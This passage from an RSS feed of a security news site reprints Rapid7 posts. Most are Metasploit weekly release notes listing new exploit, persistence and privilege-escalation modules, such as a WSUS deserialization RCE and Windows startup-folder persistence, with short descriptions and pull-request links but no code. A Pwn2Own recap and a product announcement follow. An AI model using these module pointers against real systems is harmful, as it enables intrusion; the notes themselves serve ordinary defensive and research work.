qA1pEZATmRZZyRUBERABERABERABERABERCBASSQuhM5gMzUJBEQAREQAREQAREQAREQAREYWgJyIoe262MbrgwiIAIiIAIiIAIiIAIiIAIicBwBOZHHIdEBEeh3AtJfBERABERABERABERABNIjICcyPbaSLAIiIALNEVBuERABERABERABEegDAnIi+6CTpKIIiIAIiEBvE5B2IiACIiACIjBMBOREDlNvq60iIAIiIAIiIAK1BLQvAiIgAiLQAgE5kS1AUxEREAEREAEREAEREIFuElDdIiAC3SQgJ7Kb9FW3CIiACIiACIiACIiACAwTAbV1IAjIiRyIblQjREAEREAEREAEREAEREAERCA9ArWS5UTW0tC+CIiACIiACIiACIiACIiACIhAJAE5kZF4eu2k9BEBERABERABERABERABERCB7hKQE9ld/qp9WAionSIgAiIgAiIgAiIgAiIwIATkRA5IR6oZIiAC6RCQVBEQAREQAREQAREQgWMJyIk8loe+iYAIiIAIDAYBtUIEREAEREAERCAlAnIiUwIrsSIgAiIgAiIgAq0QUBkREAEREIFeJyAnstd7SPqJgAiIgAiIgAiIQD8QkI4iIAJDQ0BO5NB0tRoqAiIgAiIgAiIgAiIgAscT0BERaJaAnMhmiSm/CIiACIiACIiACIiACIiACHSfQNc0kBPZNfSqWAREQAREQAREQAREQAREQAT6j4CcyHb7TOVFQAREQAREQAREQAREQAREYIgIyIkcos5WU48loG8iIAIiIAIiIAIiIAIiIALNE/h/AAAA///LnjyhAAAABklEQVQDAPpJLE//oBxNAAAAAElFTkSuQmCC"><h2>It has “SUS” in the name, what did you expect?</h2><p>This week’s release features the much-hyped CVE-2025-59287, a Critical-Severity Windows Server Update Service (WSUS) vulnerability that allows for SYSTEM level remote code execution. <a href="https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/">Documented</a> among the multiple recent zero-days in Windows, the vulnerability affects Windows Servers running the WSUS service, which is not enabled by default. Several vendors, including Huntress and Eye Security have reported seeing the exploit used in the wild, and the Cybersecurity and Infrastructure Security Agency (CISA) ordered US government agencies to patch affected machines last month.</p><h2>New module content (1)</h2><h3>Windows Server Update Service Deserialization Remote Code Execution</h3><p>Authors: msutovsky-r7 and mwulftange </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20674">#20674</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> </p><p>Path: <span data-type="inlineCode">windows/http/wsus_deserialization_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-59287&amp;referrer=blog">CVE-2025-59287</a></p><p>Description: Adds a module targeting CVE-2025-59287, an unauthenticated deserialization vulnerability in the Windows Server Update Service (WSUS) resulting in remote code execution as SYSTEM</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20576">#20576</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - This updates the LINQPad persistence module to use the new persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20669">#20669</a> from <a href="https://github.com/stfnw">stfnw</a> - This updates the auxiliary/scanner/http/azure_ad_login module to print the domain and username in error messages. This enables users to understand what user caused the error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20690">#20690</a> from <a href="https://github.com/dbono-r7">dbono-r7</a> - This adds the cert pipe to the list of known pipes that will be checked by the auxiliary/scanner/smb/pipe_auditor module. This effectively enables users to identify when the MS-ICPR interface is available because Active Directory Certificate Services (AD CS) is in use.</li></ul><h2>Documentation (1)</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20625">#20625</a> from <a href="https://github.com/h00die">h00die</a> - Improved multiple modules’ documentation to have consistent formatting.</li></ul><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-11-05T15%3A39%3A36Z..2025-11-12T18%3A54%3A53Z%22">Pull Requests 6.4.97...6.4.98</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.97...6.4.98">Full diff 6.4.97...6.4.98</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 at Pwn2Own: Raising the Bar in Vuln Intel]]></title>
<description><![CDATA[As the 2025 edition of Pwn2Own Ireland draws to a close, we are taking a beat to reflect on Rapid7’s participation and achievements, both this year and last, in the world of competitive zero day exploit development. Pwn2Own is a zero day exploit competition run by the Zero Day Initiative (ZDI) an...]]></description>
<link>https://tsecurity.de/de/3095708/it-security-nachrichten/rapid7-at-pwn2own-raising-the-bar-in-vuln-intel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095708/it-security-nachrichten/rapid7-at-pwn2own-raising-the-bar-in-vuln-intel/</guid>
<pubDate>Thu, 13 Nov 2025 12:05:52 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>As the 2025 edition of Pwn2Own Ireland draws to a close, we are taking a beat to reflect on Rapid7’s participation and achievements, both this year and last, in the world of competitive zero day exploit development. </span></p><p><a href="https://www.trendmicro.com/en_us/zero-day-initiative/pwn2own.html"><span>Pwn2Own</span></a><span> is a zero day exploit competition run by the </span><a href="https://www.zerodayinitiative.com/"><span>Zero Day Initiative</span></a><span> (ZDI) and held across a number of locations each year. Every edition of the competition begins roughly three months prior to the event, whereby the organizer announces a list of targets, either popular software or hardware devices, that will be available for contestants to hack during the event. </span></p><p><span>The twist is that this is a zero day exploit competition; the targets will all be running the latest version of their software, meaning contestants must prepare in advance a zero-day exploit comprising as-yet unknown vulnerabilities, and then successfully demonstrate their exploit live at the event.</span></p><h2>Why Rapid7 participates in Pwn2Own</h2><p><span>Zero-day research is at the core of Rapid7’s vulnerability intelligence capabilities. Our research teams regularly </span><a href="https://www.rapid7.com/blog/?blog_tags=Vulnerability+Disclosure"><span>find and disclose</span></a><span> novel vulnerabilities affecting enterprise software and hardware appliances. </span></p><p><span>Our work in this space gives our customers industry-first product coverage for the vulnerabilities we find and disclose through our own </span><a href="https://www.rapid7.com/blog/post/2022/12/28/refreshing-rapid7s-coordinated-vulnerability-disclosure-policy/"><span>CVD program</span></a><span>, ensures our research teams maintain a technical capability that either matches or exceeds the threat actors we are defending against, and ultimately strengthens the broader cybersecurity ecosystem by identifying and fixing critical vulnerabilities before attackers can exploit them.</span></p><p><span>We believe we can continue to do our best work in this space by constantly raising the bar. Competing at an industry-leading event like Pwn2Own is the perfect example of this. Success at this competition is hard. The targets are hard targets; there are no easy wins or low-hanging fruit here. </span></p><p><span>The timeframes are short and fraught - many of the vendors whose products are in the competition are actively trying to patch out vulnerabilities before the contest begins. The competition is tough - vulnerability researchers from all over the world are competing against one another for the same rewards. </span></p><p><span>These are the constraints with which we love to challenge ourselves. Meeting the challenge raises the bar and ensures our vulnerability intelligence capabilities are world class.</span></p><h2>Rapid7’s success at Pwn2Own… so far</h2><p><span>Our success at Pwn2Own began last year at Pwn2Own Ireland 2024, where Rapid7 Security Researcher Ryan Emmons </span><a href="https://www.zerodayinitiative.com/blog/2024/10/22/pwn2own-ireland-day-one-the-results"><span>successfully hacked</span></a><span> a Synology DiskStation DS1823xs+ on day one of the competition, winning the DiskStation target for the competitions Network Attacked Storage (NAS) category. </span></p><p><span>Ryan’s exploit not only included a new zero day vulnerability affecting the DiskStation, but also a novel exploitation technique to achieve unauthenticated remote code execution on the device. This is a great example of what Rapid7’s research capabilities in this space can achieve, going beyond a single vulnerability and into novel techniques. Ryan delivered a </span><a href="https://www.rapid7.com/blog/post/disguisedelimit-rapid7-talks-nas-exploitation-at-def-con-33/"><span>DEF CON 2025 talk</span></a><span> this year, presenting his novel exploitation technique publicly for the first time to industry peers.</span></p><p>⠀</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb0bbf9c3eb87ca97/68fb7f963d52558e575982f1/p2o.png" height="516" position="left" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="p2o.png" asset-alt="p2o.png" width="687" max-width="687" max-height="516" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb0bbf9c3eb87ca97/68fb7f963d52558e575982f1/p2o.png" data-sys-asset-uid="bltb0bbf9c3eb87ca97" data-sys-asset-filename="p2o.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="p2o.png" sys-style-type="display"></figure><p><span><em>Rapid7’s Stephen Fewer (far left) and Ryan Emmons (center) at Pwn2Own Ireland 2024. </em></span><br><span><em>Image credit: </em></span><span><em>Markus Gaasedelen</em></span></p><p>⠀</p><p><span>Our success at Pwn2Own has continued this year at Pwn2Own Ireland 2025, where Sr. Principal Security Researcher Stephen Fewer </span><a href="https://www.zerodayinitiative.com/blog/2025/10/21/pwn2own-ireland-2025-day-one-results"><span>successfully hacked</span></a><span> a Home Assistant Green device on day one of the competition, winning the Home Assistant Green target for the competition's Smart Home Devices category. </span></p><p><span>Stephen’s exploit consisted of three separate zero-day vulnerabilities, and included a container escape for unauthenticated remote code execution on the device's host OS.</span></p><h2>What's next for Rapid7 Labs?</h2><p><span>Into 2026 and beyond, our vulnerability intelligence team continues to: </span></p><ul><li><p><span>Monitor and understand high-profile vulnerabilities that are either currently or likely to be exploited in the wild as part of Rapid7’s Emergent Threat Response (ETR) program. </span></p></li><li><p><span>Research new zero-day vulnerabilities to strengthen both our customer and the broader cybersecurity ecosystems. </span></p></li><li><p><span>Develop new Metasploit exploit modules to ensure defenders have reliable access to offensive tooling. </span></p></li><li><p><span>Push the boundary of what we can achieve in this space through research-informed intelligence.</span></p></li></ul><p>Keep up with the work we do right here on the Rapid7 blog, as well as through our community vulnerability intelligence platform, <a href="https://attackerkb.com/" target="_blank">AttackerKB</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 10/24/2025]]></title>
<description><![CDATA[Let us suggest persistence…This week's edition brings the new persistence suggester from h00die. Similar to the exploit variant, this module will list the available persistence mechanisms for your selected target. The module requires a session to target the machine, so it can run check methods fr...]]></description>
<link>https://tsecurity.de/de/3095707/it-security-nachrichten/metasploit-wrap-up-10242025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095707/it-security-nachrichten/metasploit-wrap-up-10242025/</guid>
<pubDate>Thu, 13 Nov 2025 12:05:50 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Let us suggest persistence…</h2><p>This week's edition brings the new persistence suggester from <a href="https://github.com/h00die">h00die</a>. Similar to the exploit variant, this module will list the available persistence mechanisms for your selected target. The module requires a session to target the machine, so it can run check methods from potential persistence modules. This new module represents an update to our new persistence category.</p><h2>New module content (3)</h2><h3>Service System V Persistence</h3><p>Author: h00die</p><p>Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20522">#20522</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/persistence/init_sysvinit</p><p>Description: This pulls out <span data-type="inlineCode">systemvinit</span> from the <span data-type="inlineCode">init</span> persistence module and adds the new persistence mixin.</p><h3>Remote Code Execution Vulnerability in Vvveb</h3><p>Authors: Hamed Kohi and Maksim Rogov</p><p>Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20630">#20630</a> contributed by <a href="https://github.com/vognik">vognik</a></p><p>Path: multi/http/vvveb_auth_rce_cve_2025_8518</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-8518&amp;referrer=blog">CVE-2025-8518</a></p><p>Description: This adds a new module for Vvveb, exploiting a code injection vulnerability in the code editor (CVE-2025-8518). The module requires credentials to the CMS.</p><h3>Persistence Exploit Suggester</h3><p>Author: h00die</p><p>Type: Post Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20564">#20564</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: multi/recon/persistence_suggester</p><p>Description: This adds a new module for persistence category - persistence suggester. It suggests a persistence mechanism depending on the target.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20522">#20522</a> from <a href="https://github.com/h00die">h00die</a> - This pulls out <span data-type="inlineCode">systemvinit</span>from the <span data-type="inlineCode">init</span> persistence module and adds the new persistence mixin.</li></ul><h2>Bugs fixed (6)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20629">#20629</a> from <a href="https://github.com/h00die">h00die</a> - Updates module documentation headers for consistency.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20636">#20636</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fixes a bug in the web crawler's handling of pages that are not found.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20639">#20639</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash when running the scanner/oracle/oracle_login module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20640">#20640</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - This fixes a bug in the ldap_esc_vulnerable_cert_finder where when RUN_REGISTRY_CHECKS was set to true and the the module was run with a low privilege user the module was crashing.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20654">#20654</a> from <a href="https://github.com/molecula2788">molecula2788</a> - Fixes a bug with Meterpreter's extensions handling functionality which impacted the pivot payload.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20655">#20655</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash when performing the migration command in a Meterpreter session.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20632">#20632</a> from <a href="https://github.com/h00die">h00die</a> - Improves the documentation and impacted version details for the <span data-type="inlineCode">linqpad_deserialization_persistence</span> module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-10-16T09%3A42%3A01Z..2025-10-24T14%3A39%3A21%2B01%3A00%22">Pull Requests 6.4.94...6.4.95</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.94...6.4.95">Full diff 6.4.94...6.4.95</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Defend Smarter, Not Harder: The Power of Curated Vulnerability Intelligence]]></title>
<description><![CDATA[Let’s be honest, we as an industry spend far too long responding to issues that simply don’t matter. Chasing down false positives, reviewing threat intelligence reports that bear no relation to our sector, and more recently reviewing vulnerability advisories of systems not deployed within the env...]]></description>
<link>https://tsecurity.de/de/3095705/it-security-nachrichten/defend-smarter-not-harder-the-power-of-curated-vulnerability-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095705/it-security-nachrichten/defend-smarter-not-harder-the-power-of-curated-vulnerability-intelligence/</guid>
<pubDate>Thu, 13 Nov 2025 12:05:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Let’s be honest, we as an industry spend far too long responding to issues that simply don’t matter. Chasing down false positives, reviewing threat intelligence reports that bear no relation to our sector, and more recently reviewing vulnerability advisories of systems not deployed within the environment. To address this challenge, Rapid7 delivers actionable intelligence through </span><a href="https://www.rapid7.com/blog/post/2025/04/23/from-noise-to-action-introducing-intelligence-hub/"><span>Intelligence Hub</span></a><span>, which we announced in April of this year. </span></p><p><span>Today marks a day where we are delighted to incorporate </span><a href="https://www.rapid7.com/about/press-releases/rapid7-accelerates-exposure-remediation-with-ai-generated-risk-insights-and-enhanced-vulnerability-intelligence/"><span>vulnerability intelligence</span></a><span> within Rapid7’s Command Platform. The purpose of this capability is to identify the vulnerabilities that actually matter, rather than relying on generic security ratings or trying to decipher whether the amber rating is dark orange or not.  </span></p><p><span>Our approach within Rapid7 has always been focused on quality curation over sheer volume to deliver high-fidelity intelligence - because information without context isn't intelligence, it's just noise. Across </span><a href="https://www.rapid7.com/research/"><span>Rapid7 Labs</span></a><span>, our teams of experts, assisted by our proprietary AI/ML analysis, work to actively cut through the constant noise of raw threat data, transforming it into actionable, contextualized insights delivered across the Rapid7 </span><a href="https://www.rapid7.com/platform/"><span>Command Platform</span></a><span>. </span></p><p><span>Instead of overwhelming security teams, we surface only the most critical findings regarding actively exploited vulnerabilities, threat actors, and their motivations. This high-fidelity intelligence enables faster prioritization and mitigation of the risks that genuinely matter.</span></p><h2><span>How Rapid7 curates vulnerability intelligence that actually matters</span></h2><p><span>Research led vulnerability intelligence has been a core strategy within Rapid7 Labs for many years. It allows us to reactively defend against current threats through comprehensive </span><a href="https://attackerkb.com/search?q=&amp;hasRapid7Analysis=1&amp;sort=newest-created"><span>technical analysis</span></a><span>, product coverage, and subject matter expert led decision making. It also allows us to proactively identify and remediate new vulnerabilities long before the threat actors can leverage them. </span></p><p><span>We do this through our zero day research, where we find and coordinate </span><a href="https://www.rapid7.com/blog/?blog_tags=Vulnerability+Disclosure"><span>disclosure</span></a><span> of new high impact vulnerabilities, giving our customers industry first coverage and strengthening the broader cybersecurity ecosystem. The next step in this strategy is curating our vulnerability intelligence capabilities directly into our products.</span></p><h2><span>Explore CVEs by Threat Actor, Exploitability, and Impact</span></h2><p><span>With </span><a href="https://www.rapid7.com/blog/post/2025/04/23/from-noise-to-action-introducing-intelligence-hub/"><span>Intelligence Hub,</span></a><span> we started an evolution that aims to deliver this curated, high-fidelity threat intelligence. Starting next month, Intelligence Hub will deliver a new, comprehensive view into critical vulnerabilities via curated CVE profiles. These profiles will provide security teams with the context needed for actionable, adversary-aware prioritization of threats that pose the highest risk to their organization before they escalate. </span></p><p><span>Expertly curated by the Rapid7 Labs Vulnerability Intelligence team, the new CVE Library will serve as your organization’s tailored, trusted source of which CVEs are actively exploited, by whom, and what impact they have to your environment by providing:</span></p><ul><li><p><span><strong>CVE properties</strong></span><span> based on public metadata, along with available Metasploit Modules for teams to identify, exploit, and perform post-exploitation actions on CVEs.</span></p></li><li><p><span><strong>AttackerKB assessments </strong></span><span>for comprehensive analysis into the critical vulnerabilities that matter and how any exploit works. </span></p></li><li><p><span><strong>Threat actor and campaign details</strong></span><span> curated from proprietary Rapid7 Labs vulnerability and threat research.</span></p></li><li><p><span><strong>MITRE ATT&amp;CK mapping </strong></span><span>of TTPs (</span><span><em>coming early 2026)</em></span></p></li><li><p><span><strong>Dark web mentions </strong></span><span>Take back control - understand what will likely be exploited next with our proprietary ‘Probabilistic likelihood of exploitation’ assessment (</span><span><em>coming early 2026).</em></span></p></li></ul><p>⠀</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdab430e12c331695/6901685f3a6db2d57fe488cf/Vi2.png" height="521" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Vi2.png" asset-alt="Vi2.png" width="683" max-width="683" max-height="521" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdab430e12c331695/6901685f3a6db2d57fe488cf/Vi2.png" data-sys-asset-uid="bltdab430e12c331695" data-sys-asset-filename="Vi2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Vi2.png" sys-style-type="display"></figure><p><span><em>CVE Profile in Intelligence Hub of recent CVE-2025-20362.</em></span></p><h2><span>Accelerate exposure remediation with Intelligence Hub &amp; Remediation Hub</span></h2><p><span>The same curated threat actor and campaign insights from Intelligence Hub’s CVE profiles will also be integrated into </span><a href="http://www.rapid7.com/blog/post/pt-remediate-vulnerabilities-faster-with-ai-generated-risk-intelligence"><span>Remediation Hub</span></a><span> alongside new AI-powered remediation guidance, helping security teams to prioritize the most impactful remediations. With one click, joint customers can seamlessly pivot to Intelligence Hub’s detailed Threat Actor and Campaigns pages to dive deeper.</span></p><p><span>This unified approach enables security teams to prioritize actions based on a clear, AI-generated summary, validate the urgency with external, real-world threat actor and campaign insights from Intelligence Hub, and take immediate, informed action - all without leaving Rapid7’s Command Platform.</span></p><p>⠀</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3a6dbc33a23bf09/6901685f4e9e4134cca5efdf/VI3.png" height="533" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="VI3.png" asset-alt="VI3.png" width="678" max-width="678" max-height="533" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3a6dbc33a23bf09/6901685f4e9e4134cca5efdf/VI3.png" data-sys-asset-uid="bltd3a6dbc33a23bf09" data-sys-asset-filename="VI3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="VI3.png" sys-style-type="display"></figure><p><span><em>Threat Actors associated with a remediation project in Remediation Hub.</em></span></p><h2><span>End the noise: Curated intelligence for confident decisions</span></h2><p><span>With expanded vulnerability intelligence capabilities and high-impact integration with Remediation Hub, Intelligence Hub empowers teams to execute </span><span><strong>threat-informed </strong></span><span>remediation without the added burden of needing to piece together CVE details from across the internet. </span></p><p><span>Coupled with its expansive repository of actionable insights into threat actors, campaigns, IOCs, and more, Intelligence Hub is your team’s integrated solution to expert-vetted, low-noise vulnerability and threat intelligence that you can trust.</span></p><p><span>Learn more about Rapid7’s Intelligence Hub </span><a href="https://www.rapid7.com/platform/threat-intelligence-tip/?tab=Decisive"><span>here</span></a><span>.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 10/31/2025]]></title>
<description><![CDATA[New module content (3)ReDoc API Docs UI ExposedAuthor: Hamza Sahin Type: AuxiliaryPull request: #20594 contributed by HamzaSahin61Path: scanner/http/redoc_exposedDescription: Adds a module to detect publicly exposed ReDoc API documentation pages using read-only HTTP GET requests searching for com...]]></description>
<link>https://tsecurity.de/de/3095701/it-security-nachrichten/metasploit-wrap-up-10312025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095701/it-security-nachrichten/metasploit-wrap-up-10312025/</guid>
<pubDate>Thu, 13 Nov 2025 12:05:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>New module content (3)</h2><h3>ReDoc API Docs UI Exposed</h3><p>Author: Hamza Sahin </p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20594">#20594</a> contributed by <a href="https://github.com/HamzaSahin61">HamzaSahin61</a></p><p>Path: scanner/http/redoc_exposed</p><p>Description: Adds a module to detect publicly exposed ReDoc API documentation pages using read-only HTTP GET requests searching for common HTML markers.</p><h3>NCR Command Center Agent Remote Code Execution</h3><p>Authors: daffainfo (Muhammad Daffa) and jjcho (Jericho Nathanael Chrisnanta)</p><p>Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20650">#20650</a> contributed by <a href="https://github.com/daffainfo">daffainfo</a></p><p>Path: windows/misc/ncr_cmcagent_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2021-3122&amp;referrer=blog">CVE-2021-3122</a></p><p>Description: This adds a new unauthenticated remote code execution module to the NCR Command Center Agent. The module sends malicious XML containing the runCommand parameter, triggering the unauthenticated execution of a PowerShell payload.</p><h3>Windows Persistent Startup Folder</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20662">#20662</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/startup_folder</p><p>Description: This adds a new persistence module for Windows - the startup folder. The module will drop the payload into the startup programs folder. The module can drop the payload into a folder for a specific user or the system, affecting all users.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20631">#20631</a> from <a href="https://github.com/h00die">h00die</a> - Moves the windows registry module into the persistence category and expands its capabilities by using the persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20648">#20648</a> from <a href="https://github.com/bcoles">bcoles</a> - This adds an additional set of credentials to be used by the exploit/apple_ios/ssh/cydia_default_ssh module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20661">#20661</a> from <a href="https://github.com/mmacfadden">mmacfadden</a> - Add support for aarch64 payloads to exploit/multi/http/gitea_git_fetch_rce module.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-10-24T14%3A39%3A21%2B01%3A00..2025-10-30T07%3A38%3A51Z%22">Pull Requests 6.4.95...6.4.96</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.95...6.4.96">Full diff 6.4.95...6.4.96</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 11/07/2025]]></title>
<description><![CDATA[New module content (3)Centreon authenticated command injection leading to RCE via broker engine "reload" parameterAuthor: h00die-gr3y h00die.gr3y@gmail.comType: ExploitPull request: #20672 contributed by h00die-gr3yPath: linux/http/centreon_auth_rce_cve_2025_5946AttackerKB reference: CVE-2025-594...]]></description>
<link>https://tsecurity.de/de/3095693/it-security-nachrichten/metasploit-wrap-up-11072025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095693/it-security-nachrichten/metasploit-wrap-up-11072025/</guid>
<pubDate>Thu, 13 Nov 2025 12:05:30 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>New module content (3)</h2><h3>Centreon authenticated command injection leading to RCE via broker engine "reload" parameter</h3><p>Author: h00die-gr3y <a href="mailto:h00die.gr3y@gmail.com">h00die.gr3y@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20672">#20672</a> contributed by <a href="https://github.com/h00die-gr3y">h00die-gr3y</a></p><p>Path: linux/http/centreon_auth_rce_cve_2025_5946</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-5946&amp;referrer=blog">CVE-2025-5946</a></p><p>Description: Adds an exploit module for Centreon. The vulnerability, an authenticated command injection, will lead to a remote code execution.</p><h3>Rootkit Privilege Escalation Signal Hunter</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20643">#20643</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: linux/local/rootkit_privesc_signal_hunter</p><p>Description: Expands diamorphine privilege escalation module to other rootkits that use signal handling for privilege escalation.</p><h3>Windows Persistent Task Scheduler</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20660">#20660</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/task_scheduler</p><p>Description: This adds a new persistence module for Windows - the task scheduler module. The module will create scheduled tasks depending on the ScheduleType option.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20523">#20523</a> from <a href="https://github.com/h00die">h00die</a> - This updates the upstart persistence to use the new persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20643">#20643</a> from <a href="https://github.com/bcoles">bcoles</a> - Expands diamorphine privilege escalation module to other rootkits, which use signal handling for privilege escalation.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20673">#20673</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Temporarily pins date dependency to 3.4.1 due to possible issues associated with 3.5.0 to allow for further testing.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-10-30T07%3A38%3A51Z..2025-11-05T15%3A39%3A36Z%22">Pull Requests 6.4.96...6.4.97</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.96...6.4.97">Full diff 6.4.96...6.4.97</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a 